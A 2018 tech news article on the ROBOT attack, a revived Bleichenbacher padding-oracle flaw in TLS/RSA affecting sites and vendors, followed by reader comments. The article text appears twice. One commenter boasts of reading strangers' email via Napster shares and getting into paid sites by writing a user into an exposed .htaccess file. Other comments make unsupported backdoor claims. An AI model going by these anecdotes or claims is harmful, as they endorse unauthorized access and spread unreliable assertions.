Thursday, January 11th 2018
Hack Like It's 1998: Sites Still Vulnerable to Revived ROBOT Exploit
Another week, yet another security bulletin in tech news, with yet another vulnerability that joins the fray of both Intel's meltdown and Western Digital's MyCloud hacks. A team of researchers recently wrote a paper they titled "Return Of Bleichenbacher's Oracle Threat (ROBOT)". This paper went on to show how a well-known, circa 1998 exploit is still a viable way to take advantage of websites of even big name companies and services, such as Facebook and PayPal (in total, around 2.8% of the top 1 million sites also tested positive). The ROBOT exploit, a critical, 19-year-old vulnerability that allows attackers to decrypt encrypted data and sign communications using compromised sites' secret encryption key, is still valid. Only, it's 19 years later.
The heart of the issue stems from a vulnerability that was discovered in 1998 by researcher Daniel Bleichenbacher, who found the vulnerability in the TLS predecessor known as secure sockets layer. The attack is dubbed an Oracle threat because attackers can write specialized queries to which the websites and affected systems respond with "Yes" or "No"; as such, it's possible, given enough time, for attackers to build up the amount of disclosed sensitive information and get a clear picture of the protected data. To the flaw's discovery by Bleichenbacher, SSL architects apparently responded in a B-movie type of way, which nevertheless might have been needed to keep all systems green: by designing workarounds on top of workarounds, rather than removing or rewriting the faulty RSA algorithm."We were able to identify eight vendors and open-source projects and a significant number of hosts that were vulnerable to minor variations of Bleichenbacher's adaptive-chosen ciphertext attack from 1998," the researchers wrote in their research paper. "The most notable fact about this is how little effort it took us to do so. We can therefore conclude that there is insufficient testing of modern TLS implementations for old vulnerabilities." Affected products include some made by F5, Citrix, and Cisco.
"The surprising fact is that our research was very straightforward. We used minor variations of the original attack and were successful. This issue was hiding in plain sight," the researchers wrote in a blog post. "This means neither the vendors of the affected products nor security researchers have investigated this before, although it's a very classic and well-known attack."
Sources:
Return Of Bleichenbacher’s Oracle Threat (ROBOT) Paper, Robot Attack, via ArsTechnica, via TPU Forums @ user StefanM
The heart of the issue stems from a vulnerability that was discovered in 1998 by researcher Daniel Bleichenbacher, who found the vulnerability in the TLS predecessor known as secure sockets layer. The attack is dubbed an Oracle threat because attackers can write specialized queries to which the websites and affected systems respond with "Yes" or "No"; as such, it's possible, given enough time, for attackers to build up the amount of disclosed sensitive information and get a clear picture of the protected data. To the flaw's discovery by Bleichenbacher, SSL architects apparently responded in a B-movie type of way, which nevertheless might have been needed to keep all systems green: by designing workarounds on top of workarounds, rather than removing or rewriting the faulty RSA algorithm."We were able to identify eight vendors and open-source projects and a significant number of hosts that were vulnerable to minor variations of Bleichenbacher's adaptive-chosen ciphertext attack from 1998," the researchers wrote in their research paper. "The most notable fact about this is how little effort it took us to do so. We can therefore conclude that there is insufficient testing of modern TLS implementations for old vulnerabilities." Affected products include some made by F5, Citrix, and Cisco.
"The surprising fact is that our research was very straightforward. We used minor variations of the original attack and were successful. This issue was hiding in plain sight," the researchers wrote in a blog post. "This means neither the vendors of the affected products nor security researchers have investigated this before, although it's a very classic and well-known attack."
15 Comments on Hack Like It's 1998: Sites Still Vulnerable to Revived ROBOT Exploit
You aparently can't be a hacker without a hoodie.
Nothing can really change, if we still keep using protocols from 40 years ago. Like TCP/IP and Ethernet and all that. You can't just turn off the internet now and fix all those things under the hood, that would require to actually replace the internet. But we also can't ever rely on not being hacked on it.
Nobody would know back in the time, that the date of '2000' and not 1999, would cause problems into certain DOS applications which had problems with storing '00' as last 2 digits showing the year.
Nobody would knew, that intel was having hardware that had build in flaws that exist for more then 20 years and never is found untill recent. I think the world is going so fast these days that due to production, costs and mangement, crucial parts of hard and software are being skipped on.
People want things faster and if they cant get it they head to competition as well. It's no secret that all intel hardware is rejected by country's such as russia considering the bugs / backdoors built into the CPU. For example, IMEI which cant really be shutdown but yet be exploited.
The idea is great but the experience is that not many teams really focus on getting a genuine, solid & safe product. Look at Ipone's. It takes a company from Israel to hack the device for the FBI. I mean apple has done a great job securing their phone's that millions need to be paid in order to crack the security on these phone's. That's how a decent product should be.
As talking about flaws. I remember in the past i bought alot of HDD's from ebay, figuring out i could restore the complete history of what people did with those drives with a simple, low level undelete tool. Not many people actually realise that dragging something into the recycle bin will actually delete the contents from harddrive. Or that a format is not sufficient enough to completely wipe the data. When i sold old parts such as my own HDD's i pretty much made sure that they where overwritten for at least 12 times minimum, just to prevent what i did on my own by someone else.
Napster. Great program. Simular as many other forks and programs to share stuff with everyone on the internet. Yet with one flaw. The complete C drive among many people was being shared. So it was a piece of cake to search for 'inbox.dbx' and basicly download everyone's stupid IMAP / POP3 folder from outlook express. Oh man i had some fun years with experimenting on the internet. In the past there where alot of triple x websites which had their security 'flawed' in such a matter that i was able to 'write' my own user and hashed password into a .htaccess file which was'nt properly secured and gained access to normally, websites from which should be payed for in the first place with credit card.
From my experience, the world and technology is moving so fast that even i cant keep up. I really dislike Windows 10 for switching to a service model with bullshit telemetry and privacy invading techniques. Yes MS is capable of identifying a person just based on the details it is harvesting. MS can push an update to a particular user which grants NSA or some shit access. Skype has a backdoor for the NSA and proberly other intelligence services and so are many other digital forms of communications. You are not safe on the internet. Privacy does not exist and company's are going more further and further to completely sell all your details.
I've wrecked the telemetry that's build into W7 and made sure it's not communicating again to the outside world. When support ends for W7, i am switching over to Linux and start focussing more and more on privacy.
Example we take the existing format;
255.255.255.255
And we add a fifth set to the front rendering;
255.255.255.255.255.
Any number with only four sets, representing existing addresses, would be interpreted as zero's followed by the rest of the numbers;
000.255.255.255.255.
That solution could have been integrated into existing hardware and software almost seamlessly.
Take that one step further and increased the range of numbers from 0 thru 255 to 0 thru 511, thus;
511.511.511.511.511
This then renders such an enormous number of addresses that every person alive or dead in the history of mankind could be allocated a thousand addresses and we'd only ever use a small fraction of the total available. And it's still easy to integrate and fully backwards compatible with the existing IPV4 standard, making a transition easy. The hex-based mess they came up with is comparatively inefficient, at the same time overly complex and almost completely incompatible with IPV4. IMHO it was/is a move that was completely mental and absurd.
As to this news/OP, the NSA probably shed another tear.
Also, the uniformity of TSL/SSL makes it vulnerable as a system. HTTPS should really be replaced by a protocol that's more able to evolve (servers add newer, better, more diversified security technology that browsers can quickly implement and switch to/from as needed). Find a vulnerability and it should only effect a small portion of the internet.
Basic mathematical principles state that no number is too big. Take any number you can think of and add 1. So applying that principle to byte math, take 4bytes and add 1byte. You get 5bytes, or 40bits. Keep adding until you reach a bit/byte number that is sufficient to the needs of the task. We have generally gone by powers of two because it makes some things easier, but there is nothing actually limiting us from using other schemes. Example, there have been 3bit, 5bit, 6bit, 7bit, 9bit and 12bit CPU's. It's why we have so many color palette sizes for graphic display array's. 1, 2, 4, 8, 10, 12, 14, 15, 16, 20, 24 and 32bit color palettes and so on. The same is true for storage. Microsoft Server 2003 is a 32bit OS and yet it can address up to 64GB of RAM. How do they do this? 36bit memory address space applied via PAE. That math, used in network transmission protocols, is identical in practice. Need more address space? Add a few bits or a byte, or set of bytes, to the scheme. We don't have to rewrite the whole system to accommodate more address space. The only action needed is the application of basic math; Addition. K.I.S.S. Now this is a very good point!